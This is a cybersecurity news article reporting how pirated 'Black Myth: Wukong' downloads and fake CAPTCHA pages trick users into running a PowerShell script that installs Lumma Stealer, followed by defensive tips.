Cracked ‘Black Myth: Wukong’ Spreading Lumma Stealer Malware

A pirated version of the “Black Myth: Wukong” video game is used by cybercriminals to spread the Lumma Stealer malware. Attackers are using fake CAPTCHA pages to distribute the malware, deceiving users into executing malicious scripts under the guise of verifying they are not bots. This ongoing operation targets users globally, with phishing emails and counterfeit game download sites acting as key infection vectors.

Cracked ‘Black Myth: Wukong' promises

McAfee's report details how users seeking free or cracked versions of popular games such as Black Myth: Wukong or Dying Light 2 are being redirected to malicious CAPTCHA pages. These pages use social engineering tricks, prompting users to click on “I'm not a robot” buttons.

Once clicked, a Base64-encoded PowerShell script is copied to the clipboard, and users are instructed to run it manually, unknowingly triggering the malware installation. The scripts are designed to download and install Lumma Stealer, a well-known information-stealing malware capable of exfiltrating passwords, browser data, cryptocurrency wallets, and more.

The infection chain begins with users searching online for cracked versions of popular games. Public forums and repositories, including sites hosted on Runkit and GitHub, lure users with promises of free downloads. Upon clicking on download links, users are funneled through redirections to the fake CAPTCHA pages, where the attack unfolds.

The campaign also targets GitHub users via phishing emails, impersonating the platform's security team and warning recipients of a fabricated vulnerability. Once recipients click the provided link, they are directed to the same malicious CAPTCHA system.

Lumma Stealer is dropped onto the infected system through an obfuscated and encrypted script, making detection difficult. The script, when executed, downloads additional payloads from remote servers, often storing them in the Temp folder to evade scrutiny. This multi-layered encryption and use of legitimate tools like PowerShell further complicates efforts to identify and block the attack.

Key measures to minimize the likelihood of info-stealer malware infections include:

• Do not download cracked software from unauthorized sources, and steer clear of suspicious websites.
• Beware of phishing scams and fake CAPTCHA prompts.
• Regularly updating antivirus software to detect and block malware at multiple stages.
• Enabling email filtering to intercept phishing attempts.
• Restricting clipboard-based scripts and disable automatic execution of scripts on systems.

The immense popularity of “Black Myth: Wukong” has made it a prime target for cybercriminals seeking to exploit its high-profile release. During the game's launch in August 2024, Steam was hit by a massive DDoS attack orchestrated by the AISURU botnet, which crippled the platform for millions of users worldwide. The game's popularity and already massive user base provide cybercriminals with ample opportunity to launch a plethora of attacks.